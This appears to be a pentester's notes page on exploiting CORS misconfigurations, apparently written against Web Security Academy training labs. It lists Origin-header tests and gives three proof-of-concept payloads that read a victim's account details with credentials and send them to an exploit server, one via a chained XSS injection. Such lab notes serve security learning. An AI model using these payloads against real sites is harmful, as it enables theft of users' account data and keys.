Intrusionz3r0-WriteupsHacktheboxGithubLinkedln
ChatGPTChatGPT

Cross-origin resource sharing (CORS)

Methodology

  1. Look for any CORS-related headers, such as:

    • Access-Control-Allow-Credentials

    • Access-Control-Allow-Origin

  2. Inject a custom Origin header and observe if it is reflected:

    • Origin: http://malicious-server.com

  3. Attempt to inject a null value as the Origin header.

  4. Attempt to inject a trusted-looking origin to bypass basic checks:

    • Origin: http://malicious-website.trusted-subdomain.com

  5. Attempt to inject a malicious domain that includes a trusted subdomain as a subpath:

    • Origin: http://trusted-subdomain.malicious-website.com

  6. If step 4 or 5 works, try to find an XSS vulnerability to exploit the misconfigured CORS and achieve full exploitation.

POC - CORS vulnerability with basic origin reflection

Example of reflection:

<script>
	var xhr = new XMLHttpRequest();
	var url = "https://0a5700af03252f57800853a300030003.web-security-academy.net"
	xhr.onreadystatechange = function(){
		if (xhr.readyState == XMLHttpRequest.DONE){
			fetch("/log?key="+xhr.responseText)
		}
	}
	xhr.open("GET", url + "/accountDetails", true );
	xhr.withCredentials = true;
	xhr.send(null)
</script>

POC - CORS vulnerability with trusted null origin

Example of Trusted null origin:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0a710082034c5cc4821c98cb00790013.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='https://exploit-0a4100cc034e5ccc824a97f401f40059.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

POC - CORS vulnerability with trusted insecure protocols

Example of trusted insecre protocols

<script>
    document.location="http://stock.0aaa009c03ea093180d8355900d30095.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0aaa009c03ea093180d8355900d30095.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0aab0047030f09d6809b34e7011000f9.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

PreviousCross-site request forgery (CSRF)NextClickjacking

Last updated